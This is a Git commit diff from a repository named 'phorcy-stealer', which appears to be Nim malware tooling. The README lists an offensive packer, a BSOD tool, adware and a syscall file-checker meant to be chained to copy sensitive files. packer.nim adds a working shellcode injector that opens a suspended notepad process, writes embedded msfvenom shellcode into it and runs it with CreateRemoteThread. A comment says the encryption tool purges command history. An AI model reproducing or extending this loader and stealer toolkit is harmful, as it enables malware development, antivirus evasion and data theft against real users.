whiskers/phorcy-stealer
4
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

[S] worked on nim. added changes to NIM docs.

Browse Source
This commit is contained in:
eline
2023-11-29 13:37:44 +01:00
parent e774316a70
commit 59512d7b64
6 changed files with 135 additions and 74 deletions
Download Patch File Download Diff File Expand all files Collapse all files

20
elinethingz/README.md
View File

@@ -11,13 +11,9 @@ format:
[seq[byte]](@[0x40,0x80]
# mic_reg.nim
[Broken]
Checks if Windows OSD is enabled.
# encfile.nim
Has multiple functions to encrypt text and/or files (streams) with AES-256 derived using HMAC (SHA512_256). Max. password size 1024.
Has multiple functions to encrypt text and/or files (streams) with AES-256 derived using HMAC (SHA512_256). Max. password size 1024 characters. Tested. Is suitable for sensitive data.
Has a fingerprint/is detectable.
# OFFENSIVEencfile.nim
Very stripped-down encryption tool. Takes a stream and encrypts it (AES256 with HMAC SHA512_256). No max. password size.
@@ -28,4 +24,16 @@ Ideally a "packer"/loader for the main stage. Still very experimental and needs
# bsod.nim
Serves a BSOD to targets on Windows.
Serves a BSOD to targets on Windows.
# mic_reg.nim
[Broken]
Checks if Windows OSD is enabled.
# checkfile.nim
Basic program that uses direct syscalls to know if a file exists. Undetectable in normal conditions.
Can be chained with other direct syscalls to copy sensitive files.
# basicadware.nim
Basic adware. At execution, shows a MessageBox with a title and content picked from a random (limited) pool.

2
elinethingz/security/packer/OFFENSIVEencfile.nim
View File

@@ -20,6 +20,8 @@
# i.e ./offensiveencfile input output password
# or maybe only get password interactively. hmm...
# WARNING:
# This program purges command history on Windows.
import nimcrypto
import std/sysrand

152
elinethingz/security/packer/packer.nim
View File

@@ -7,70 +7,118 @@
# see https://github.com/byt3bl33d3r/OffensiveNim/blob/master/src/pop_bin.nim
# see https://github.com/byt3bl33d3r/OffensiveNim/blob/master/src/shellcode_bin.nim
import os
import system
const
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READWRITE = 0x40
type
HANDLE* = int
HWND* = HANDLE
UINT* = int32
LPCSTR* = cstring
proc MessageBox*(hWnd: HWND, lpText: LPCSTR, lpCaption: LPCSTR, uType: UINT): int32
{.discardable, stdcall, dynlib: "user32", importc: "MessageBoxA".}
MessageBox(0, "Hello, world !", "Nim is Powerful", 0)
#  LPVOID VirtualAllocEx(
#  [in] HANDLE hProcess,
#  [in, optional] LPVOID lpAddress, BUT IF NULL: automatically calculated
#  [in] SIZE_T dwSize, is an int? size in bytes of memory region. "The size of the region of memory to allocate, in bytes."
#  [in] DWORD flAllocationType, see https://learn.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualallocex
#  [in] DWORD flProtect
#  );
import winim/lean
import osproc
# proc NimVirtualAllocEx*(hWnd: HWND, lpAddress: pointer, dwSize: LPCSTR, uType: UINT): int32
# {.discardable, stdcall, dynlib: "user32", importc: "VirtualAllocEx".}
proc injectCreateRemoteThread[I, T](shellcode: array[I, T]): void =
# Under the hood, the startProcess function from Nim's osproc module is calling CreateProcess() :D
let tProcess = startProcess("notepad.exe") # notepad is in PATH. change with whatever the loader loaded.
tProcess.suspend() # That's handy!
defer: tProcess.close()
# Declare the VirtualAlloc function from Windows API
proc VirtualAlloc*(addr: pointer void, size: csize_t, allocType: cuint, protect: cuint): pointer cvoid {.importwinapi: "VirtualAlloc".}
echo "[*] Target Process: ", tProcess.processID
# Declare a simple function that will be loaded into the allocated memory
proc helloWorld() =
echo "Hello, World from allocated memory!"
let pHandle = OpenProcess(
PROCESS_ALL_ACCESS,
false,
cast[DWORD](tProcess.processID)
)
defer: CloseHandle(pHandle)
# Main procedure
proc main(): int =
# Calculate the size needed for the function
let codeSize = procSize(helloWorld)
echo "[*] pHandle: ", pHandle
# Allocate memory using VirtualAlloc
let allocatedMemory = VirtualAlloc(nil, codeSize, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE)
if allocatedMemory == nil:
echo "Failed to allocate memory."
return 1 # Return an error code
let rPtr = VirtualAllocEx(
pHandle,
NULL,
cast[SIZE_T](shellcode.len),
MEM_COMMIT,
PAGE_EXECUTE_READ_WRITE
)
# Copy the function code to the allocated memory
memcpy(allocatedMemory, addr(helloWorld), codeSize)
var bytesWritten: SIZE_T
let wSuccess = WriteProcessMemory(
pHandle,
rPtr,
unsafeAddr shellcode,
cast[SIZE_T](shellcode.len),
addr bytesWritten
)
# Cast the allocated memory to a function pointer
let funcPointer: proc() {.cdecl.} = cast[proc()](allocatedMemory)
echo "[*] WriteProcessMemory: ", bool(wSuccess)
echo " \\-- bytes written: ", bytesWritten
echo ""
# Execute the function in the allocated memory
funcPointer()
let tHandle = CreateRemoteThread(
pHandle,
NULL,
0,
cast[LPTHREAD_START_ROUTINE](rPtr),
NULL,
0,
NULL
)
defer: CloseHandle(tHandle)
# Deallocate the memory (optional)
os.free(allocatedMemory)
echo "[*] tHandle: ", tHandle
echo "[+] Injected"
return 0 # Return 0 to indicate successful execution
when defined(windows):
when isMainModule:
main()
# https://github.com/nim-lang/Nim/wiki/Consts-defined-by-the-compiler
when defined(i386):
# ./msfvenom -p windows/messagebox -f csharp, then modified for Nim arrays
echo "[*] Running in x86 process"
var shellcode: array[272, byte] = [
byte 0xd9,0xeb,0x9b,0xd9,0x74,0x24,0xf4,0x31,0xd2,0xb2,0x77,0x31,0xc9,0x64,0x8b,
0x71,0x30,0x8b,0x76,0x0c,0x8b,0x76,0x1c,0x8b,0x46,0x08,0x8b,0x7e,0x20,0x8b,
0x36,0x38,0x4f,0x18,0x75,0xf3,0x59,0x01,0xd1,0xff,0xe1,0x60,0x8b,0x6c,0x24,
0x24,0x8b,0x45,0x3c,0x8b,0x54,0x28,0x78,0x01,0xea,0x8b,0x4a,0x18,0x8b,0x5a,
0x20,0x01,0xeb,0xe3,0x34,0x49,0x8b,0x34,0x8b,0x01,0xee,0x31,0xff,0x31,0xc0,
0xfc,0xac,0x84,0xc0,0x74,0x07,0xc1,0xcf,0x0d,0x01,0xc7,0xeb,0xf4,0x3b,0x7c,
0x24,0x28,0x75,0xe1,0x8b,0x5a,0x24,0x01,0xeb,0x66,0x8b,0x0c,0x4b,0x8b,0x5a,
0x1c,0x01,0xeb,0x8b,0x04,0x8b,0x01,0xe8,0x89,0x44,0x24,0x1c,0x61,0xc3,0xb2,
0x08,0x29,0xd4,0x89,0xe5,0x89,0xc2,0x68,0x8e,0x4e,0x0e,0xec,0x52,0xe8,0x9f,
0xff,0xff,0xff,0x89,0x45,0x04,0xbb,0x7e,0xd8,0xe2,0x73,0x87,0x1c,0x24,0x52,
0xe8,0x8e,0xff,0xff,0xff,0x89,0x45,0x08,0x68,0x6c,0x6c,0x20,0x41,0x68,0x33,
0x32,0x2e,0x64,0x68,0x75,0x73,0x65,0x72,0x30,0xdb,0x88,0x5c,0x24,0x0a,0x89,
0xe6,0x56,0xff,0x55,0x04,0x89,0xc2,0x50,0xbb,0xa8,0xa2,0x4d,0xbc,0x87,0x1c,
0x24,0x52,0xe8,0x5f,0xff,0xff,0xff,0x68,0x6f,0x78,0x58,0x20,0x68,0x61,0x67,
0x65,0x42,0x68,0x4d,0x65,0x73,0x73,0x31,0xdb,0x88,0x5c,0x24,0x0a,0x89,0xe3,
0x68,0x58,0x20,0x20,0x20,0x68,0x4d,0x53,0x46,0x21,0x68,0x72,0x6f,0x6d,0x20,
0x68,0x6f,0x2c,0x20,0x66,0x68,0x48,0x65,0x6c,0x6c,0x31,0xc9,0x88,0x4c,0x24,
0x10,0x89,0xe1,0x31,0xd2,0x52,0x53,0x51,0x52,0xff,0xd0,0x31,0xc0,0x50,0xff,
0x55,0x08]
elif defined(amd64):
# ./msfvenom -p windows/x64/messagebox -f csharp, then modified for Nim arrays
echo "[*] Running in x64 process"
var shellcode: array[295, byte] = [
byte 0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51,
0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48,
0x8b,0x52,0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,0x3e,0x48,
0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,
0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e,
0x48,0x8b,0x52,0x20,0x3e,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88,
0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x6f,0x48,0x01,0xd0,0x50,0x3e,0x8b,0x48,
0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x5c,0x48,0xff,0xc9,0x3e,
0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,
0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x3e,0x4c,0x03,0x4c,0x24,
0x08,0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x3e,
0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,
0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,
0x59,0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x49,0xc7,0xc1,
0x00,0x00,0x00,0x00,0x3e,0x48,0x8d,0x95,0xfe,0x00,0x00,0x00,0x3e,0x4c,0x8d,
0x85,0x0f,0x01,0x00,0x00,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff,
0xd5,0x48,0x31,0xc9,0x41,0xba,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x48,0x65,0x6c,
0x6c,0x6f,0x2c,0x20,0x66,0x72,0x6f,0x6d,0x20,0x4d,0x53,0x46,0x21,0x00,0x4d,
0x65,0x73,0x73,0x61,0x67,0x65,0x42,0x6f,0x78,0x00]
# equivalent of 'if __name__ == '__main__' in python
# when isMainModule:
# injectCreateRemoteThread(shellcode)
injectCreateRemoteThread(shellcode)

16
elinethingz/utils/basicadware.nim
View File

@@ -20,12 +20,14 @@ proc MessageBox*(hWnd: HWND, lpText: LPCSTR, lpCaption: LPCSTR, uType: UINT): in
var
titlemessages = @["Are you really free?",
"Window on the street, only mesmerized and pondering... Am I in the right?"]
captionmessages = @["From the river to the sea, Palestine will be free.",
"I believe and have faith in you."]
"Poland!"]
captionmessages = @["From the river to the sea, Palestine will be free.", "We are the people of Heaven.",
"War is peace. Slavery is freedom. Ignorance is strength.","Kurva mac!"] # todo: convert to cstrings
randomize() # seeds randomizer
var
randomtitle:string = sample(titlemessages)
randommessage:string = sample(captionmessages)
var
randomtitle:cstring = sample(titlemessages).cstring
randommessage:cstring = sample(captionmessages).cstring
if isMainModule:
MessageBox(0, randomtitle, randommessage, 0)

7
elinethingz/utils/stealfile.nim → elinethingz/utils/checkfile.nim
View File

@@ -4,8 +4,9 @@ proc fileExists(filename: cstring): bool =
result = GetFileAttributesA(filename) != INVALID_FILE_ATTRIBUTES
const
filename = "C:\\path\\to\\your\\file.txt"
filename = "C:\\path\\to\\your\\file.txt" # double-\ because it's an escape character.
if fileExists(filename):
echo "The file exists!"
echo "File exists."
else:
echo "The file does not exist."
echo "File does not exist."